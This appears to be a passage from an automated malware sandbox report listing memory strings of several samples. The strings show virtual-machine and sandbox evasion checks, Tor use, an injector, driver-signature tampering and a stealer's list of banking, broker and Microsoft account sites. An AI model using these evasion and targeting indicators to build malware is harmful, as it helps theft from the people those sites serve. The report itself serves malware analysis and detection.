proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: explorer.exe, 00000022.00000003.3309134937.000000000C16B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000N%\
Source: explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: z5SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWb
Source: DB15.exe, 00000011.00000002.4519701063.00000000005A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@Ld%SystemRoot%\system32\mswsock.dll~~H]
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: 71C9.exe, 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: main.isRunningInsideVMWare
Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}": 0 } }bL
Source: explorer.exe, 00000022.00000003.3298043524.000000000C271000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: explorer.exe, 00000022.00000003.3200607811.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000002.4538945131.0000000009283000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4418026226.0000000009283000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\swenum.inf_loc
Source: explorer.exe, 00000022.00000003.3249356607.000000000C05A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000464b
Source: explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4VMware Virtual disk SCSI Disk Devicep3
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: vmhgfsP
Source: explorer.exe, 00000002.00000000.2110113315.000000000973C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000022.00000002.4531306676.0000000007BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter8-port with 1068e
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: explorer.exe, 00000022.00000003.3298755838.000000000C091000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: DB15.exe, 00000013.00000002.4525021781.0000000003100000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0-
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2110113315.000000000978C000.00000004.00000001.00020000.00000000.sdmp, DB15.exe, 0000000C.00000003.2830885638.0000000000776000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840859633.0000000000718000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 0000000C.00000002.2840859633.0000000000776000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000003.2851421571.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.0000000000548000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000013.00000002.4517742104.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2978332467.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2980820218.0000000000698000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: explorer.exe, 00000002.00000000.2108009239.00000000073E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: 11VBoxSFWINDIRWD
Source: 71C9.exe, 0000001D.00000002.3177865561.000000000123E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: explorer.exe, 00000002.00000000.2110427730.00000000098AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: aryvmcixn-SR-%W
Source: explorer.exe, 00000022.00000002.4548475747.000000000C05A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: explorer.exe, 00000022.00000003.3196669836.000000000943F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00
Source: build2.exe, 00000029.00000002.3569722785.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: explorer.exe, 00000022.00000003.3309134937.000000000C16B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}y
Source: explorer.exe, 00000022.00000003.3304971546.000000000C16B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 00000022.00000003.3306212746.000000000C259000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: tVMSrvcs|!
Source: explorer.exe, 00000002.00000000.2106796270.0000000000D99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: A0B.exe, 00000017.00000003.3011732883.0000000001490000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3124819163.0000000001492000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7
Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DB15.exe, 00000016.00000003.2978332467.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000002.2982508997.0000000000726000.00000004.00000020.00020000.00000000.sdmp, DB15.exe, 00000016.00000003.2977655775.0000000000726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW|y
